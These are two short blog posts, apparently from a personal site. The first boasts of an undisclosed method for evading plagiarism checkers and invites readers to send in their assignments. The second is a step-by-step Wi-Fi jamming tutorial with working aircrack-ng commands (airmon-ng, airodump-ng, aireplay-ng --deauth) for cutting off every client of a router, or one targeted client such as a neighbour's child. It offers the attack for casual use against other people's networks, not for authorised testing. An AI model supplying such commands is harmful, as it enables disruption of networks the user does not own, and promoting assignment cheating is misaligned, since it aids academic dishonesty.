September 25, 2014

Bypassing the Plagiarism checker - The Logical Kid

Hello!

I have been watching people messed up when there is an assignment to be written!
There is no problem in writing them all, as you need to submit a soft-copy which will be carefully analysed by some web-based plagiarism checker.
Well, in this case lets try a popular Plagiarism Checker.

To test a couple of lines for plagiarism, lets use the lyrics of one of my favorite songs by Swingin' Utters!
"Stupid Lullabies"

I provide the lyrics in the box which asks for the input to test for any plagiarism.
The lyrics are as follows:
"Singing you stupid lullabies and handcuffed tight behind my back under your mother's watchful eye"

Lets see what the Plagiarism checker shows!





Omg! We are caught! This tool had caught us copying stuff!


Lets give my trick a shot!
Abracadabra..
                                                           Kaboom! Magic!

I am not going to specify the stuff I did to bypass the content from getting caught as plagiarized content, but it is not any inspect-element(ish) kiddo stuff or web based bypass, et al.
The result is genuine, and is 100% guaranteed to bypass the plagiarism check.
No! This ain't some kind of weakness in the Plagiarism checker I have used. This "magic" of mine works good on all the other tools of the sort!

So, don't you think its high time that you shoot your assignments over my mailbox? ;)


"If you are good at something, never do it for free!"

September 16, 2014

Wireless (Access-points) Jammer for fun and profit! - The Logical Kid

Hello everybody!
Today I am going to show you how to jam a wireless access-point , or say a wi-fi router nearby.

Question: Okay! So now do you want me to buy some device for it?
Answer: Obviously NO. This can be done if your laptop can access Wi-Fi, as simple as that. Well, do you mind using Linux OS btw? :)


Tools of the trade (software):
aircrack-ng suite


For Latest yet beta version of aircrack-ng (with patch for -1 always channel)
Linux users, install it by giving the following commands in terminal:

sudo apt-get install subversion libnl-dev                                 
cd /opt/                                                                                                    
sudo svn co http://svn.aircrack-ng.org/trunk/ aircrack-ng
cd aircrack-ng                                                                                      
sudo make                                                                                             

sudo make install                                                                               
Now that you have installed the tool, time for action.


Step 1: Check for the wireless interface in your system.

Open the terminal (ctrl+alt+t) and enter the following command:
iwconfig



Step 2: Get the wireless interface in monitor mode.
sudo airmon-ng start <interface_name>

sudo airmon-ng start wlan0


Now, the tool will create another interface named mon0 on which the monitor mode gets enabled.



Step 3: Now, see for all the access points nearby.

sudo airodump-ng mon0



You will see all the wireless access points nearby.


Note the MAC address or the SSID (name) of the access point which you want to block, and also the MAC address of the client whom you want to prevent from accessing the Access Point or say, the router.

Let us consider two scenarios:
i) Disallow all the clients from accessing the target Wi-Fi router.
ii) Disallow a specific client from accessing the target Wi-Fi router.

Scenario i:

1) Open a new terminal (ctrl+alt+t) and enter the following command:

sudo aireplay-ng --deauth 0 -a <access_point_mac_address> <wireless_interface> 

                                                  (or)


 sudo aireplay-ng --deauth 0 -e <SSID> <wireless_interface> 

  Here, let me try to disallow connections of all clients to an access point named "Connectify-me"

So I give the following command:
sudo aireplay-ng --deauth 0 -e Connectify-me mon0

P.s: In cases where you get "channel -1" error, append --ignore-negative-one to the end of the command.

The command would be as follows:

sudo aireplay-ng --deauth 0 -e Connectify-me mon0 --ignore-negative-one


Give ctrl+c to terminate.

 To give a fixed number of deauth requests, change 0 to any specific value.
sudo aireplay-ng --deauth 10 -e Connectify-me mon0 --ignore-negative-one

In this above command, I have asked aireplay-ng to send 10 deauthentication packets.

Thats it! While our aireplay-ng keeps sending deauthentication packets, no client can connect to this Access Point.
As simple as it seems, right?
Remember, this ain't rocket science after-all. :)

Question: Omg! Thats fantabulous, but I love my neighbor for providing me free Wi-Fi so I don't want him to be blocked from accessing Wi-Fi and others too, but then I don't like Mr. Patel's son to access this router --that kid is a torrent leecher! Eats all the data.
Anything to stop only that kid?

Solution: Yes! You do not need to worry, 'coz you can selectively jam any clients too! ;)


Scenario ii:

1) Okay! Now for this, we specifically need to monitor the clients which are connecting to the target router/access point.
Open a new terminal and enter the following command(s):

sudo airodump-ng --bssid <target_access_point_MAC> <interface>

sudo airodump-ng --bssid 6A:5A:B6:A3:7C:48 mon0


We can see two clients connected to our target Access Point.
Good! Now we will try to jam the connectivity of the client which has the MAC address 40:78:6A:A7:95:E5

2) Enter the following command:
sudo aireplay-ng --deauth 10 -c 40:78:6A:A7:95:E5 -e Connectify-me mon0 --ignore-negative-one

where -c is for the client
10 - number of deauth packets to send (If you give 0, that means infinite)




Happy Diwali! :) :D